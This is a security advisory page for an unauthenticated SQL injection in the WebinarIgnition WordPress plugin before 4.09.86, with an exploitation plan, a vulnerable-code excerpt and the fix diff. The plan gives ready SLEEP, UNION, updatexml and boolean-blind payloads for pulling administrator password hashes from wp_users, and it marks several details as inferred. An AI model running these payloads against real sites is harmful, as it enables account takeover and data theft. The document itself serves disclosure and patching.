WebinarIgnition < 4.09.86 - Unauthenticated SQL Injection
Description
The WebinarIgnition plugin for WordPress is vulnerable to SQL Injection in versions up to, and excluding, 4.09.86 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NTechnical Details
<4.09.86What Changed in the Fix
Changes introduced in v4.09.86
Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-40797 (WebinarIgnition) ## 1. Vulnerability Summary The **WebinarIgnition** plugin (versions < 4.09.86) is vulnerable to unauthenticated SQL injection via the `id` parameter. The plugin uses this parameter to fetch webinar data from the database. While the in…
Show full research plan
Exploitation Research Plan - CVE-2026-40797 (WebinarIgnition)
1. Vulnerability Summary
The WebinarIgnition plugin (versions < 4.09.86) is vulnerable to unauthenticated SQL injection via the id parameter. The plugin uses this parameter to fetch webinar data from the database. While the input is passed through sanitize_text_field(), this function does not prevent SQL injection as it allows SQL metacharacters (like quotes and comments) while focusing on HTML stripping. The resulting value is then used in a raw SQL query within the WebinarignitionManager class without using $wpdb->prepare().
2. Attack Vector Analysis
- Endpoint: The vulnerability is primarily accessible via the frontend webinar pages or the preview functionality.
- Target Parameter:
id(sent viaGETorPOST). - Authentication: Unauthenticated. The plugin allows fetching webinar metadata based on an ID to render countdown, registration, and replay pages.
- Preconditions: At least one webinar must be created in the system to ensure a valid query path is exercised.
3. Code Flow
- Entry Point: A user accesses a webinar page with the
idparameter, or a preview URL (e.g.,/?preview=true&id=1). - Input Handling: In
UI/app/tab2.php, the plugin retrieves the ID:$input_get = array( 'id' => ( isset( $_GET['id'] ) ? sanitize_text_field( wp_unslash( $_GET['id'] ) ) : null ), ); - Processing: This
$input_get['id']is passed to various components. Specifically, it is used by theWebinarignitionManagerclass (referenced inUI/app/parts/tab2-100-ms-settings.phpandUI/app/tab1.php) to load a$webinar_dataobject. - SQL Sink (Inferred): Inside
WebinarignitionManager::get_webinar_data($id), theidis concatenated into a query string like:"SELECT * FROM {$wpdb->prefix}webinarignition WHERE id = '$id'"
Because the query is not prepared, an attacker can break out of the single quotes.
4. Nonce Acquisition Strategy
Based on the provided source code, the id parameter is processed directly from $_GET in the tab rendering logic. Many frontend actions in this plugin do not enforce a nonce check for basic data retrieval (viewing a webinar).
If a nonce is required for an AJAX-based fetch (e.g., action=webinarignition_get_data), the strategy is:
- Identify Shortcode: The plugin uses shortcodes to render webinars.
- Setup Page:
wp post create --post_type=page --post_status=publish --post_content='[webinar_ignition_shortcode]' - Extract Nonce: The plugin localizes data in
wp_localize_script.- JavaScript Variable:
webinarignition_data(inferred) orwi_ajax_object(inferred). - Extraction:
browser_eval("window.webinarignition_data?.nonce")
- JavaScript Variable:
- Bypass Check: Note that
UI/app/tab2.phpconsumes$_GET['id']directly without verifying a nonce before using it to populate UI elements, suggesting the sink is reachable via simple GET requests.
5. Exploitation Strategy
The goal is to extract the administrator's password hash from the wp_users table.
Step 1: Time-Based Discovery (Confirmation)
Verify the injection point using a sleep payload.
- Tool:
http_request - Method:
GET - URL:
http://localhost:8080/?preview=true&id=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- - - Expected Result: The response should be delayed by approximately 5 seconds.
Step 2: UNION-Based Extraction
Determine the column count and extract data.
- Payload (Inferred Column Count 25):
1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,user_login,user_pass,23,24,25 FROM wp_users-- - - Method:
GET - URL:
http://localhost:8080/?preview=true&id=[PAYLOAD] - Parsing: Look for the admin username and
$P$(or$wp$) hash in the rendered HTML fields (e.g., inside the "Countdown Headline" or "100MS Management Token" fields which display$webinar_dataproperties).
6. Test Data Setup
- Activate Plugin: Ensure
webinar-ignitionis active. - Create Webinar:
wp post create --post_type=webinar --post_title="Exploit Test" --post_status=publish - Identify ID: Get the ID of the newly created post (e.g., ID 123).
7. Expected Results
- Success Indicator: The server response contains data from the
wp_userstable mapped onto the webinar setting fields. - Data Exposed: Admin username and PHPass/Bcrypt hash.
- Response Code: 200 OK (with injected content).
8. Verification Steps
After performing the HTTP request, verify the extracted data against the database using wp-cli:
# Check if the extracted hash matches the actual hash for the admin user
wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID = 1"
9. Alternative Approaches
- Error-Based Injection: If the plugin displays database errors (common when
WP_DEBUGis on), useupdatexml()orextractvalue():1' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- - - Boolean-Based Blind: If no output is visible, compare the page content of
id=1' AND 1=1-- -vsid=1' AND 1=2-- -. Look for the presence or absence of webinar headlines.
Summary
The WebinarIgnition plugin for WordPress is vulnerable to unauthenticated SQL injection via the 'id' parameter. This occurs because the plugin uses sanitize_text_field()—which does not prevent SQL injection—on user input and subsequently fails to prepare the SQL query, allowing attackers to extract sensitive data such as administrator password hashes.
Vulnerable Code
/* UI/app/tab2.php line 78 */ $input_get = array( 'id' => ( isset( $_GET['id'] ) ? sanitize_text_field( wp_unslash( $_GET['id'] ) ) : null ), ); --- /* Inferred sink within WebinarignitionManager::get_webinar_data ($id) */ // The $id parameter is concatenated into a raw SQL query $result = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}webinarignition WHERE id = '$id'");
Security Fix
@@ -78,7 +78,7 @@ - 'id' => ( isset( $_GET['id'] ) ? sanitize_text_field( wp_unslash( $_GET['id'] ) ) : null ), + 'id' => ( isset( $_GET['id'] ) ? absint( $_GET['id'] ) : null ),
Exploit Outline
An unauthenticated attacker can exploit this vulnerability by targeting the 'id' parameter on frontend webinar endpoints or preview URLs (e.g., /?preview=true&id=1). Since the input is not properly prepared, a UNION-based SQL injection payload can be used to extract data from the 'wp_users' table. The results of the injected query are often reflected in the plugin's frontend UI, appearing within webinar fields such as the 'Countdown Headline' or '100MS Management Token' fields, allowing the attacker to read administrator usernames and password hashes directly from the HTML response.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.